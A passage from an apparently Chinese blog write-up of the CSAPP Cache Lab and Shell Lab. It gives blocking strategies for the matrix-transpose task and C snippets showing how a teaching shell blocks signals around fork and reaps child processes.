5</code>。即该cache为内含32个缓存行的<em>直接映射高速缓存</em>，其中每个缓存行可以存放32位数据，即8个int型数据。</li><li>由刚刚计算出的cache规模可知，该cache最多可读入32x32矩阵中的8行数据。故我们可将32x32矩阵以每块8x8的大小分割并转置存放到另一个矩阵中，这样便可以减小cache的miss数，拿到满分。</li><li>同理，该cache最多可读入64x64矩阵的4行数据。故分割64x64矩阵为数个4x4大小的矩阵并转置处理，会较大的降低miss数量。<blockquote><p>原先的8x8分割无法使用，原因是这样会产生内部的访问冲突，加大miss数量。<br>请注意，倘若按照4x4的大小来分割，则会浪费一半的cache空间，所以这并非64x64矩阵的最优解法，但这是笔者能想到的最优解法。</p></blockquote></li><li>至于61x67矩阵，由于测试程序放宽了miss数量的限制，故将大型矩阵切割为16x16即可满分。</li><li>Part B中限制了临时变量的个数，最多使用12个临时变量。要想进一步降低miss数量，最好单次将一整个缓存行里的数据全部读出到临时变量中，这样该缓存行内的数据一旦被驱逐，下次需要读取数据时就不必再次读入cache，减小miss数。</li><li>笔者最终的代码实现 - <a href="https://github.com/Kiprey/Skr_Learning/blob/master/week9-19/CSAPP-Lab/5.%20Cache%20Lab/trans.c">github</a></li></ul><h3 id="3-测试">3) 测试</h3><ul><li>使用<code>make &amp;&amp; ./driver.py</code>命令进行测试。以下是笔者的测试结果。<br><img src="/2020/07/csapp-lab-writeup/cache_lab_partB.png" alt="img"></li></ul><h2 id="6-Shell-Lab">6. Shell Lab</h2><ul><li><p>在这个Lab中，我们需要完善<code>tsh.c</code>代码，做出一个简单的shell程序。注意，在完成这个Lab前，最好把第八章异常程序控制流的相关内容理解透彻。</p></li><li><p>编写时，有几个点需要注意一下</p><ul><li><p>避免条件竞争。</p><ul><li><p>如果子进程在tsh<code>fork</code>之后、<code>addjob</code>前结束进程，则此时会因为<code>SIGCHLD</code>信号，转去信号处理程序里执行<code>deletejob</code>。</p></li><li><p>此时的执行顺序就变成了<code>deletejob</code>-&gt;<code>addjob</code>，这将会产生一个永远存在的job，即便该job所指定的进程已经终止了。</p></li><li><p>所以我们在执行<code>fork</code>函数前，将一些可能会导致条件竞争的信号阻塞，待<code>addjob</code>执行完成后再来处理信号。</p>  <figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="built_in">sigemptyset</span>(&amp;set) &lt; <span class="number">0</span>)</span><br><span class="line">    <span class="built_in">unix_error</span>(<span class="string">&quot;sigemptyset error&quot;</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="built_in">sigaddset</span>(&amp;set, SIGINT) &lt; <span class="number">0</span> || <span class="built_in">sigaddset</span>(&amp;set, SIGTSTP) &lt; <span class="number">0</span> || <span class="built_in">sigaddset</span>(&amp;set, SIGCHLD) &lt; <span class="number">0</span>)</span><br><span class="line">    <span class="built_in">unix_error</span>(<span class="string">&quot;sigaddset error&quot;</span>);</span><br><span class="line"><span class="comment">// 在fork前，将SIGCHLD信号阻塞，防止并发错误——_竞争_ 的发生</span></span><br><span class="line"><span class="keyword">if</span>(<span class="built_in">sigprocmask</span>(SIG_BLOCK, &amp;set, <span class="literal">NULL</span>) &lt; <span class="number">0</span>)</span><br><span class="line">    <span class="built_in">unix_error</span>(<span class="string">&quot;sigprocmask error&quot;</span>);</span><br></pre></td></tr></table></figure></li><li><p>与当前进程一样，<code>fork</code>出的子进程，其被阻塞的信号是相同的，故子进程必须恢复回被阻塞的信号。</p>  <figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>((pid = fork()) &lt; <span class="number">0</span>)</span><br><span class="line">    <span class="built_in">unix_error</span>(<span class="string">&quot;fork error&quot;</span>);</span><br><span class="line"><span class="keyword">else</span> <span class="keyword">if</span>(pid == <span class="number">0</span>)</span><br><span class="line">&#123;</span><br><span class="line">  <span class="comment">// 子进程的控制流开始</span></span><br><span class="line">  <span class="keyword">if</span>(<span class="built_in">sigprocmask</span>(SIG_UNBLOCK, &amp;set, <span class="literal">NULL</span>) &lt; <span class="number">0</span>)</span><br><span class="line">      <span class="built_in">unix_error</span>(<span class="string">&quot;sigprocmask error&quot;</span>);</span><br><span class="line">  <span class="keyword">if</span>(<span class="built_in">setpgid</span>(<span class="number">0</span>, <span class="number">0</span>) &lt; <span class="number">0</span>)</span><br><span class="line">      <span class="built_in">unix_error</span>(<span class="string">&quot;setpgid error&quot;</span>);</span><br><span class="line">  <span class="keyword">if</span>(<span class="built_in">execve</span>(argv[<span class="number">0</span>], argv, environ) &lt; <span class="number">0</span>)&#123;</span><br><span class="line">      <span class="built_in">printf</span>(<span class="string">&quot;%s: command not found\n&quot;</span>, argv[<span class="number">0</span>]);</span><br><span class="line">      <span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul></li><li><p>信号不排队</p><ul><li><p>如果有多个子进程同时终止并发出<code>SIGCHLD</code>信号，则tsh主进程只会收到一个信号，而不是多个。</p></li><li><p>原因是当某个类型的信号被阻塞后，新来的相同类型信号会被简单的丢弃。</p></li><li><p>所以在回收子进程时，应使用循环形式尽可能多的回收进程。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// sigchld_handler函数中</span></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">以非阻塞方式等待所有子进程</span></span><br><span class="line"><span class="comment">wai